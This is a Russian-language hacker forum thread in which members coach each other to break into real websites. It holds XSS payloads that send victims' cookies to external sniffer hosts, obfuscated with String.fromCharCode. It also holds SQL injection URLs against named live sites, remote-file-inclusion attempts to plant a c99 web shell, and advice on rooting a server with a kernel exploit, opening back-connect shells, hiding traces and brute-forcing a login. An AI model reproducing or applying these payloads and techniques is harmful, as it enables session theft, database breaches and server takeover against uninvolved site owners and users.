Как написать мне что бы куки без палева переходили на мыло или на сайт.. .И плиз можете кинуть ссылку на тему типа"Что можно сделать с багой в Xss"

samarin по первой ссылке это называется те со скулей облом
по второй те вообще выдало все поля бд E_FATAL_NOSACHOBJ тут тоже не инжэкт а апросто ашибка самой базы

Buffalon
_http://forum.antichat.ru/thread20140.html

2Buffalon
попробуй вот так :) сделай фейк этой страницы либо ручками либо через anyfake воткни на хостинг и воткнить в xss такой :
<script type="text/javascript">window.top.location = "http://путь ктвоему фейку";</script>
что собствеено откроет в этом же окне твой фейк !ссылка на почитати выше :)

самео простое - вводи в поля ввода такую штуку: '">xss и смотри где код вышел за пределы ковычки. ДЛя активных ксс - <>><}{)(xss()'=" - смотри в исходнике что фильтруется а что нет

то есть я это написал,он мне пишет что страница не найдена=значит что нет xss

а если он сьел,то значит я роюсь в исходнике?или это отображается как та на странице?оч хочу разобраться в xss

http://ha.ckers.org/xss.html =\
здесь я был, но как понял все xss пишутся в исходнике,а что потом та?

Скачай хотя бы видео тогда, ну или журнал например хакер почитай там какой то спец номер вроде был про xss (хотя мож ошибаюсь) =\ Да и на античате много статей ничуть не хуже чем в журналах.. вот прочитай все проанализируй.

здесь я был, но как понял все xss пишутся в исходнике,а что потом та?
А тут уже начинается самое сложное. Надо немного подумать

нужна помощь в xss, пытаюсь изучать, но много непонятных мелочей.
предположим нужная мне xss
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
насколько я смог понять куки записываются в картику hacknet.gif, т.е у меня должен быть свой сайт с картинкой, которую разрешено изменять на этом сайте без авторизации?или неправильно понял?
Думаю идея вопроса более-менее понятна.
Разъясните мне пожалуйста эти детали

нет это просто ссылка на сниффер

собственно сам вопрос
http://forum.antichat.ru/showpost.php?p=632546&postcount=1410

нет это просто ссылка на сниффер
ок, где взять этот снифер, как и где его разестить?
---------------------------------------------------------------------
разьясните пожалуйста детали про получение куков

_http://forum.antichat.ru/thread18555.html поиском пользоваться не барское дело?
Вот собственно помощ по гринбировскому сниферу
_http://forum.antichat.ru/thread36829.html
все понятно написано

Ужс как всё сложно =\
сливаешь http://old.antichat.ru/soft/s.zip, распаковываешь, заливаешь на сервер с поддержкой php, правишь конфиг (если таковой имеется) и всё. вставляешь в скрипт ссылку на сниффер

сорри елли не туда
возник вот такой вопрос есть ли вожможность обхода фильтрации ковычки через функцию quote() ? :)

Есть ли другие флуд-проги на форумах (IPB) помимо Antiturk(Denyo Lauch)?
(при отсутствии ограничений содавать много тем либо сообщений)

Если создать файл .htaccess и вписать в него следующую строчку:
AddTypeapplication/x-httpd-php gif - то все файлы с gif будут интрепетироваться как php файлы.
Я так и сделал. Создать .htaccess. Вписал в него строку и решил проверить для начала на своем сайте. Закинул, полез, но система выдала предупреждение, что 500 ошибка. Вообщем, файл был недоступен.
Почему? И как это можно исправить?

каким образом можно сделать дамп всей базы данных

каким образом можно сделать дамп всей базы данных
у тя доступ к базе есть или через скуль ?
если есть доступ к базе тогда почти через любой mysql клиент ежели через скуль Тогда попробуй через "SQL Injection Tool"

2Ershik
а в одном посте не судьба написать ?
такую строчку к своему добавь removehandler.gif отменяет настройки по умолчанию для файлов.gif

Если создать файл .htaccess и вписать в него следующую строчку:
AddTypeapplication/x-httpd-php gif - то все файлы с gif будут интрепетироваться как php


addtype application/x-httpd-php gif

Ershik проверь права на чтение если всё норм то смотри топик выше /\
||

у тя доступ к базе есть или через скуль ?
если есть доступ к базе тогда почти через любой mysql клиент ежели через скуль Тогда попробуй через "SQL Injection Tool"

Доступ к базе есть. подскажи хоть 1 mysql клиент

navicat, rst sql

m0use
http://forum.antichat.ru/showthread.php?t=51383

у меня вопрос по php include,
запрос вида .php?page=http://site.ru/xz.txt? выводит текст файла,почему не запускается shell?

потому, что он не воспринимается, как php-файл

1. у меня вопрос по php include,
запрос вида .php?page=http://site.ru/xz.txt? выводит текст файла,почему не запускается shell?
Потому что это не инклуд а читалка файлов
2. .php?page=http://site.ru/xz.PHP попробуй
Мда. Ты админ хакерского форума?
3. потому, что он не воспринимается, как php-файл
При инклуде любое расширение будет выполняться (пытаться выполниться) как php код.

Это не инклуд

спасибо за ответы))

Это серьёзно?Можн залить shell?
http://studsovet.ulsu.ru/forum/
Cори если не по теме

Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

юзал юнион,написало вот такое чудо )).Хотел узнать,почему выдаёт такую ошибку,и каким образом мона ещё выбрать все столбцы.Груп бай мона юзать только для определения кол.-ва столбцов,как я понял,но не выбирать(какойнить там злоссный груп селект ) ))))))))).

P.S. Help o_O )

прив, народ, блин никак не получается залить шелл в пхпбб. есть админка. не раскритих путей. аватары на нормальность проверяються (не только расширение)
Такое пробовал (http://forum.antichat.ru/showpost.php?p=198446&postcount=3)

>> Это серьёзно?Можн залить shell?
http://studsovet.ulsu.ru/forum/
Cори если не по теме

Там уже кто то постарался:
IPB WARNING [2] ipsclass::load_template(/usr/virtual/studsovet.ulsu.ru/html/forum/cache/skin_cache/cacheid_/skin_global.php) [http://www.php.net/manual/en/function.load-template.html]: failed to open stream: No such file or directory (Line: 1327 of /sources/ipsclass.php)

>> Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

юзал юнион,написало вот такое чудо )).Хотел узнать,почему выдаёт такую ошибку,и каким образом мона ещё выбрать все столбцы.Груп бай мона юзать только для определения кол.-ва столбцов,как я понял,но не выбирать(какойнить там злоссный груп селект ) ))))))))).

P.S. Help o_O )

Сразу давай ссылку.

Ж(.Сам хотел воть...ну лан,на )))

http://www.laptopshowcase.co.uk/suppliers.php?id=-4+union+select+1,2,3,4,5,6,7,8,9/*

Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
Ээээ... .
http://www.laptopshowcase.co.uk/suppliers.php?id=-4+UNION+SELECT+1,2+FROM+suppliers.id--
Помойму это похоже на ->
R']2 Buffalon

Access denied for user 'studsovet'@'localhost' to database 'mysql'
http://studsovet.ulsu.ru/index.php?pid=8&fac=-1+UNION+SELECT+1,2,3,4,5+from+mysql.user/*

Нет прав на просмотр юзеров

Пытаюсь разобраться с xss но почему-то на снифер ничего не приходит. в исходнике страницы, какую открывает пишет:

<td class='tbl2' style='padding-left:10px;padding-right:10px;'><span class='small'><a href='settings_main.php`><script>img=new Image();img.src=\"http://s.netsec.ru/snif.gif?\" document.cookie;</script>'></a></span></td>
и т.д
что здесь не так?

Велемир
Поиск по форуму и пост от Constantine:
_http://forum.antichat.ru/showpost.php?p=500497&postcount=3638
:D

Не подобрать столбцы

http://ktv-spb.ru/admin/aut.php?user=1'

видимо там mysql 3 версии или кривой запрос
2 столбца, но юнион не работает

Не подобрать столбцы

http://ktv-spb.ru/admin/aut.php?user=1'
просто ошибка в БД, ничего выловить не сможешь

Пытаюсь разобраться с xss но почему-то на снифер ничего не приходит. в исходнике страницы, какую открывает пишет:

что здесь не так?
ковычки попробуй убрать
<script>img=new Image();img.src=http://s.netsec.ru/snif.gif? document.cookie;</script>

Пытаюсь разобраться с xss но почему-то на снифер ничего не приходит. в исходнике страницы, какую открывает пишет:

что здесь не так?
img.src="http://s.netsec.ru/snif.gif?"+document.cookie;
по-моему...

img.src="http://s.netsec.ru/snif.gif?"+document.cookie;
по-моему...
там по-ходу фильтр на ковычки стоит, так что стоит попробовать без ковычек!

Ну тогда...
stringFromCharCode =)

Кавычки, судя по всему, экранируются. Можно обойти с помощью String.fromCharCode()

Можно обойти с помощью String.fromCharCode()

Та же история :(
в исходнике:
<a href='settings_main.php`><script>img = new Image(); img.src = String.fromCharCode(34)http://s.netsec.ru/snif.gif?String.fromCharCode(34) document.cookie;</script>'></a></span></td>

Та же история :(
в исходнике:
Ты что делаешь??? Тв не кавычки заменяй на ...fromCharCode, а строчку свою! и плюсик поставь перед document.cookie!

Хы-хы))
Так попробуй

String.fromCharCode(0x68,0x74,0x74,0x70,0x3a,0x2f, 0x2f,0x73,0x2e,0x6e,0x65,0x74,0x73,0x65,0x63,0x2e, 0x72,0x75,0x2f,0x73,0x6e,0x69,0x66,0x2e,0x67,0x69, 0x66,0x3f)+document.cookie;

Хы-хы))
Так попробуй
Чем это ты закодировал?или где?
-----------------------------------------
Все равно ничего не получается. Уж извините, если достал уже, но ведь я только учусь!
Вот сам запрос:
`><script>img = new Image(); img.src = "http://s.netsec.ru/smilesmile.gif?"+document.cookie;</script>
Пробую через CHAR():И если через CHAR только кавычки-одна беда
CHAR(96,62,60,115,99,114,105,112,116,62,105,109,10 3,32,61,32,110,101,119,32,73,109,97,103,101,40,41, 59,32,105,109,103,46,115,114,99,32,61,32,34,104,11 6,116,112,58,47,47,115,46,110,101,116,115,101,99,4 6,114,117,47,115,109,105,108,101,115,109,105,108,1 01,46,103,105,102,63,34,43,100,111,99,117,109,101, 110,116,46,99,111,111,107,105,101,59,60,47,115,99, 114,105,112,116,62)

----------------------------------------------------
Приведите чтоли пример, как бы сделали ВЫ!
----------------------------------------------------

Так бы и сделали

`><script>img = new Image(); img.src = String.fromCharCode(0x68,0x74,0x74,0x70,0x3a,0x2f, 0x2f,0x73,0x2e,0x6e,0x65,0x74,0x73,0x65,0x63,0x2e,
0x72,0x75,0x2f,0x73,0x6e,0x69,0x66,0x2e,0x67,0x69,
0x66,0x3f)+document.cookie;</script>

krypt3r
Чем это ты кодируешь?
----------------------------------
Так бы и сделали

`><script>img = new Image(); img.src = String.fromCharCode(0x68,0x74,0x74,0x70,0x3a,0x2f, 0x2f,0x73,0x2e,0x6e,0x65,0x74,0x73,0x65,0x63,0x2e,
0x72,0x75,0x2f,0x73,0x6e,0x69,0x66,0x2e,0x67,0x69,
0x66,0x3f)+document.cookie;</script>

не работает :(

Чем это ты кодируешь?
Все, что внутри String.fromCharCode() - это коды символов в гексальной системе.
не работает
Алерт-то хоть выскакивает? =) Попробуй потренироваться на замене имеющейся картинке страницы типа

document.images(0).src = <путь к какой-нить картинке>;

Если картинка поменялась, пробуй в src вставить код сниффера

Алерт-то хоть выскакивает? =)
конечно )))
И мои куки показывает, если попросить их через запрос вида `><script>alert(document.cookie)</script>
Но на снифер не отправляет.
Сайт на котором пытаюсь провернуть (PHP-Fusion 6.01.13)
может в нем загвоздка?-так ведь алерт есть

А может в том, что ковычки фильтруются или пробелы? пробуй так:
"><script>alert("xss")</script>
віжу у тя
`>
значь тока под ИЕ сойдёт, если другие кавычки не употреблять.
НО теж говорили зачарить смволы:
`><script>img=new/**/Image();/**/img.src=String.fromCharCode(ТУТА+ЗАЧАРИ� �НЫЙ+АДРЕС)+escape(document.cookie);</script>
вместо пробелов /**/, на случай если они фильтруются

или попробуй маниуляции с document.write(String.fromCharCode(ТУТ+ЗАЧА РИННЫЙ ВЕСЬ СКРИПТ))

А может в том, что ковычки фильтруются или пробелы? пробуй так:
Цитата:"><script>alert("xss")</script>


віжу у тя
Цитата:`>


значь тока под ИЕ сойдёт, если другие кавычки не употреблять.
Ковычки и правда фильтруются, запрос работает только такого вида:
`><script>alert(/123/)</script>
или когда в скобках (document.cookie)
остальные запросы идут лесом :)

почему же только в ИЕ?-у меня на опере показывает
пробелы пробовал заменять еще вчера-ничего не вышло
--------------------------------------------------------------------
уже все(из посоветованого), перепробовал и ничего не работает. Могу только увидеть свои куки, но любые попытки отправить их на снифер, заканчиваются обломом :(
За ответы, всем ОГРОМНОЕ спасибо, но они ни к чему так и не привели.
--------------------------------------------------------------------

я о том что javascript:alert(`xss`) сработет в ІЕ, да и то не во всех версиях. Тут можно обойтись без кавычек, а выще, стукни мне в асю - 8-0-8-8-0-3-6 - помогу

Здравствуйте, скажите пожалуйста, как в Sql инжекции выполнить Update запрос к базе?

2 Spaise
Примерно так:
update таблица set password='пароль или хеш' where login='логин юзера'

Надеюсь понятно , что password и login это условно. Нужны твои столбцы

2 Spaise
Примерно так:
update таблица set password='пароль или хеш' where login='логин юзера'

Надеюсь понятно , что password и login это условно. Нужны твои столбцы
Такой запрос катит из PhpMyAdmin, в скуле нужно количество столбцов указывать, вот здесь и облом, ни чего обновить не получается.

нет. в мускуле в скл-иньекции нельзя при основном запросе если он изначально идет не update произвести апдейт ) то есть тут нельзя разделить запрос на подобие мсскл id=1;update blabla set blabla='xek' where blabla

Я не понял вопрос по какой базе? Мой пример для MySQL конечно не катит

Вопросик возник.. е.
возможно ли через скуль багу, методом insert into
сменить пароль админа из другой базы.?
Зависит ли ето только от прав пользователя?

Вопросик возник.. е.
возможно ли через скуль багу, методом insert into
сменить пароль админа из другой базы.?
Зависит ли ето только от прав пользователя?
insert into - это добавление, а сменить это апдейт.
Я не понял вопрос по какой базе? Мой пример для MySQL конечно не катит
Мой вопрос был по MySQL и он катит, но как blackybr сказал, только не в инжекте.

на одном сайте в исходниках страницы есть такая сторочка
if(eregi("[^a-z0-9_-]",$_GET['f']) || eregi("[^a-z0-9_-]",$_GET['p'])){header ("Location: index.php?error&".SID); exit;}
могу ли я использовать для записишела в php не силен сам предполагаю что нельзя хот яи не уверен

Никак нельзя, этот код просто проверяет по регулярным выражениям значения входящих переменных и в случае несоответствия шаблону выдаёт редирект, видимо, на страницу с ошибкой.

нашел название таблицы. а при подставновкке выдаёт ошибку.
нашел вот так http://www.suas.ru/news/show.php?id=-1+union+select+1,table_name,3,4,5,table_schema,7,8 ,9,10+from+information_schema.tables+limit+41,1/*

подставил сюда http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+ru_suas_r eg_users/* и ошибка =\

В этой таблице нет ни одной записи просто, пустая она:

http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,count(1),7,8,9,10%20from% 20ru_suas_reg_users/*

d_x b b и остальные тоже пустые???
таблица не в этой бд...

Советую в дальнейшем не заниматься телепатией, а посмотреть на происходящие вещи, т.е. сначала посмотреть ссылки которые дали, а потом постить

http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9+from+s uppliers или products/*

Чёт у мя тут не получается)).В таблицах Suppliers, Downloads, Products есть столбцы name и id. Вбиваю их,пишет Suppliers not found. Значит ли это, что их нету ?)). Другие столбцы перебирать не стал)

http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9/*

P.S. Подставляя вместо 3 что-либо, пытаться угадать ? Если есть что...

Здравствуйте! :)

я ламер, но получилось залить шелл c99madshell на сервер под Software: Apache/2.0.55 (Ubuntu) mod_ssl/2.0.55 OpenSSL/0.9.8a. PHP/5.1.2 Linux webserver2 2.6.15-26-server

Нет доступа к файлам, у которых Owner root/adm
Есть доступ к root/root и root/www-data


Скажите, как получить к root/adm файлам доступ?

Посоветуйте, где что почитать нужно по этой теме?

Спасибо!

дело совсем в другом, а именно в самих правах доступа drw-r--r- к примеру..

есть статья в нашизх статьях, ищи.

Велемир, там надо лимитом пользоваться:
http://www.laptopshowcase.co.uk/suppliers.php?id=-1%20GROUP%20BY%20suppliers.id%20union%20select%201 ,2,name,4,5,6,7,8,9%20from%20suppliers%20limit%201 ,1/*

Спасибо, blackybr! :)

Подскажите, как можно и через что получить в Linux доступ к файлам root/adm, которые открыты только для этого пользователя и закрыты для группы, если есть c99madshell с правами uid=33(www-data) gid=33(www-data) groups=33(www-data) ?

Спасибо!

fervex поднять права, к примеру порутать серв. от рута ты сам сможешь права ставить любые

Спасибо, blackybr!
а порутать серв можно с помощью сплойта или ещё как?
посоветуйте, что почитать можно по рутанью Linux сервера, если залит c99madshell?

выполняешь uname -a , смотришь версию ядра и ищешь сплоиты под эту версию

Спасибо, Анжелик!
Linux webserver2 2.6.15-26-server #1 SMP Aug 2006 i686 GNU/Linux
Версию знаю, сплоит нашёл - http://www.milw0rm.com/exploits/2006

А если я его выполню в c99madshell через: gcc raptor_prctl.c -o raptor_prctl -Wall
./raptor_prctl

то какой будет результат в итоге? у меня у c99madshell'a появятся права root на эту сессию, или навсегда? или ещё что? не запалит ли это меня, и как замести следы?

Scipio, спасибо - уже большой плюс))))))).Осталось гадать )

fervex тебе нужно забиндить порт или сбэкконектиться (желаетльно чтобы псевдотерминад поддердживался скриптом) и только потом запускать, так сказать интерактивно

Проблема в следующем, есть скуль, бд - mssql, на кавычку идет фильтр, пытаюсь вытянуть что-нибудь следующим запросом - http://www.xxx.com/number.asp?id=45509+or+1=(select+top+1+table_name+ from+information_schema.columns+where+column_name= char(112,97,115,115,119,111,114,100)--
В ответ ошибка - The char function requires 1 arguments.
Что не так, и как можно обойти ?

удобнее хексить, но и charить можно, только не как в мускуле, а каждый сисмвол в отдельную функцию соединяя плюсам, в гет запросах %2B:
http://www.xxx.com/number.asp?id=45509+or+1=(select+top+1+table_name+ from+information_schema.columns+where+column_name= char(112)%2Bchar(97)%2Bchar(115) и т.д кстати ты перед -- скобку) пропустил

2 Scipio
Хм, а хексить как ? А то через чар таким образом муторно =/

я обычно SIPT пользую так как стоит у меня, а вобще таких прог много:
http://forum.antichat.ru/thread24918.html

Вопрос такой. Возможно ли определить наличие таблицы не используя union? То бишь я предполагаю, что в БД есть таблица, ну к примеру admin, можно ли определить есть такая таблица или нет?
Заранее мерси всем ответившим.

Вопрос такой. Возможно ли определить наличие таблицы не используя union? То бишь я предполагаю, что в БД есть таблица, ну к примеру admin, можно ли определить есть такая таблица или нет?
Заранее мерси всем ответившим.
Нет

Как не заливая шелла найти админку, мож кто адреса админок самые такие популярные скинет ?

www.ru/admin/
www.admin.site.ru/
www.ru/adm/
www.ru/administrator/
www.ru/pma/
www.ru/PhpMyAdmin/
....

Есть инклуд на сайте,с раскрытием пути.

http://rusxmms.sourceforge.net/index.php?page=home/groups/r/ru/rusxmms/htdocs/index.php

Warning: main(gaga.php): failed to open stream: No such file or directory in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39

Warning: main(): Failed opening 'gaga.php' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39

Вопрос: Как определить, статическое значение здесь или переменное? (нубский вопрос,но инклуды я ещё ниразу не юзил:РР). И ещё- можно ли её эксплуатировать(залить шелл на хостинг и перенаправить), если там не работает запрос HTTP вида

http://rusxmms.sourceforge.net/index.php?page=http://iadebilko.ru/padonag/shell.php

.Выдаёт Access Denied! - аналогично, если в файл передавать различные символы).

P.S. Пожалуйста, разъясните всё подробно - гайды читал,но многого не понял. Но это стопудо не глобальный инклудинг, ибо на GET- запросы ему тоже насрать - http://rusxmms.sourceforge.net/index.php?page=http://rambler.ru?

В этом случае бы просто расширение .xxx, в данном случае - php, отбросилось бы как гет параметр и я бы перешёл на рембелр ру.

на сурсфордже url access disabled, то есть можно инклудить только локальные файлы

на сурсфордже url access disabled, то есть можно инклудить только локальные файлы

Эмм... а как ты узнал?:Р И,в таком случае, как здесь использовать локальный инклуд? (о.О).

ну инклудить мона файл паролей и сбрутить пароли потом приконектится и поиметь сурфордж, но я сильно сомневаюсь что админы сурсфорджа допустят это ((*

Эмм... а как ты узнал?:Р И,в таком случае, как здесь использовать локальный инклуд? (о.О).
Как-как, сурсфордж похэкан уже давно

ну инклудить мона файл паролей и сбрутить пароли потом приконектится и поиметь сурфордж, но я сильно сомневаюсь что админы сурсфорджа допустят это ((*

Ммм... если они по стандартнымым путям лежат? ).А если нет?о_О

Вопрос такой. Возможно ли определить наличие таблицы не используя union? То бишь я предполагаю, что в БД есть таблица, ну к примеру admin, можно ли определить есть такая таблица или нет?
Заранее мерси всем ответившим.


mysql> select user from user where user = 'root' and exists (select * from db);
+-------+
| user |
+-------+
| root |
+-------+
1 row in set (0.00 sec)
mysql> select user from user where user = 'root' and exists (select * from bugoga);
ERROR 1146 (42S02): Table 'mysql.bugoga' doesn't exist
mysql> select user from user where user = 'root' or 1=(select count(*) from db);
+-------+
| user |
+-------+
| forum |
+-------+
1 row in set (0.01 sec)
mysql> select user from user where user = 'forum' or 1=(select count(*) from shit);
ERROR 1146 (42S02): Table 'mysql.shit' doesn't exist

.Slip, где здесь UNION и почему бы мне не заюзать такую структуру для проверки существования таблицы?

mysql> select user from user where user = 'root' and exists (select * from db);
+-------+
| user |
+-------+
| root |
+-------+
1 row in set (0.00 sec)
mysql> select user from user where user = 'root' and exists (select * from bugoga);
ERROR 1146 (42S02): Table 'mysql.bugoga' doesn't exist
mysql> select user from user where user = 'root' or 1=(select count(*) from db);
+-------+
| user |
+-------+
| forum |
+-------+
1 row in set (0.01 sec)
mysql> select user from user where user = 'forum' or 1=(select count(*) from shit);
ERROR 1146 (42S02): Table 'mysql.shit' doesn't exist

.Slip, где здесь UNION и почему бы мне не заюзать такую структуру для проверки существования таблицы?
Это ты типа сейчас выебнулся что ли?:d Вообще то я уверен на 100% что он имел в виду SQL INJ а не базу под рутом с консольным доступом. Если что, то весь вывод через консоль делается без юниона. Но бля, ты мне выведи данные из sql inj без юниона (4/5 ветка например) и без подзапросов, я тебе памятник буду строить.

А какая разница-то? Ну введу я в адресную строку

http://site.ru/?id=1+and+exists+(select+*+from+db)/*

Неужто, если в случае существования таблицы, мы не получим тот же результат, что и при id=1, а при отсутствии таблицы не выведется пустая страница или страница с ошибкой? Кстати, не говорилось "без подзапросов", говорилось "без UNION"

Привет! подскажите как взломать! если нет базы данных (MySql), вся инфа записуется, как я подозркваю в .Php фалы есть доступ в деректорию с картинками, например www.superpupersait.run/img/ М ожно просмотреть картинки, есть немного php файлов с текстом. При переходе в начальную директорию все нормально (сайт работает), как можно открыть сайт админа?
Есть еще баг когда вводиш встраке
www.superpupersait.run/superpupersait.php?id=qqq
можно увидеть вверху на форме qqq
может можно как то залить Shell файл через ссылук :D :D :) :D

Hell0, www.superpupersait.run/superpupersait.php?id='"><script>alert()</script>

результат
'%22%3E%3Cscript%3Ealert()%3C/script%3E
и в форме '\"\><script>alert()</script>
поставили слэши

зато я нашел php.ini в другой деректории и еще коечто как бы мне вытощить

кинь ссылку удобнее будет

Не могу если найду подобный сайт напишу

Hi,
Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on?
I tried to hex-encode the path, but no file is created then.

e.g:

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/'/var/www'/*

Works!

But

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/0x2f7661722f777777/*

doesn work!

Is there a possibility to dump files, if magic_quotes_gpc ist switched on?

Thank you.

Вот нашел похожее
даже круче
http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/

2Lidloses_Auge
No, this construction does not work without the quotes, hex-encoding does not help

Всем привет.
Подскажите плз как настроить брутфорс доля взлома такой вот байды
http://stat.corbina.com.ua/

Известен ник и известно что пароль только цыфры. Просьба помочь-долбался ничего не выходит :(.

А какой конкретно брут? Их навалом ).Например, тот же Brutus AET 2 (кажись так:РР).Там можно настроить по многим протоколам,кроме ссл,но для этого другие бруты есть. Гайдов по нему тоже полно( на русском кстати) .Там должны быть настройки полным перебором, по словарю(он те наф не нужен).И указан диапазон фицр в виде 0123456789.Что-то вроде того:Р

Warning: main(http://site/RamShellc99.php\0.html): failed to open stream: Connection refused in /home/groups/j/je/jedit/htdocs/index.php on line 63

Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63

Имеется запрос:

http://www.jedit.org/index.phppage=http://site/RamShellc99.php%00

В результате получается такое :

Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63

Я так понял,тут две веши:

1.У меня жутко кривые куриные лапы.
2.Фильтрация %0 на \
3.Какие-то проблемы с url- encoding ( ??? )

В данном случае, меня интересует , почему не заливается шелл =(. Про инклуды аля ../../../../../etc/pwd пожалуйста не надо)

Некоторые мысли...

Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает.

По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)

Некоторые мысли...

Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает.

По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)


Может я ща чё ляпну, но шеллкод разве может исполняться в любом файле ? (шеллкод системная с*ка :) ) Мошь он просто выдаёт несоответствие расширений, и потому не исполняет. Ждём-с мнение экспертов ).

include($page.php) зло (

во-первых php код при инклуде будет выполнятся с любым расширеним
во-вторых дело тут не в экранировании нул-байта, а именно в проблеме доступа к удалённому хосту

Эмм... и в чём же там дело Ж(. Что делать то:Р

не надоело тебе сурсфордж ломать? я же сказал в прошлоых постах что там url access disabled + magic quotes on

))))))))))))))))))))))). лучшеб объяснил бы, где первое выставляется на серве :Р. А Через Post- запросы тоже чтоль никаг ? о_О...... * Ушёл весь раскрасневшийся*.

Может я ща чё ляпну, но шеллкод разве может исполняться в любом файле ? (шеллкод системная с*ка ) Мошь он просто выдаёт несоответствие расширений, и потому не исполняет. Ждём-с мнение экспертов ).
Я имел в виду не шелл-код а php-шелл:)

urk access disabled выставляется в php.ini

пример http://www.1gb.ru/phpinfo.php ищи строчку allow url open там написано on, значит разрешено. это распространяется на include fopen и все подобные файловые ф-ии которые умеют открывать файлы удаленно, тип запроса не играет роли

urk access disabled выставляется в php.ini

пример http://www.1gb.ru/phpinfo.php ищи строчку allow url open там написано on, значит разрешено. это распространяется на include fopen и все подобные файловые ф-ии которые умеют открывать файлы удаленно, тип запроса не играет роли

наверное не urk а url ;)


blackybr: ага, описался.

ВаааЪ пасибки пиплы ^_______________^. Слышал тут про магические кавычки - иё обойти есь шанс о_О ? (Для будущиx восxождений:Р=

http://site.com/index.php?page=http://site.ru/shell.php?
или просто залей шелл с нужным раширением

Ясненько. Кстати , blackybr , Я пытался залить шелл на www.jedit.org, а не сурсфорджнет))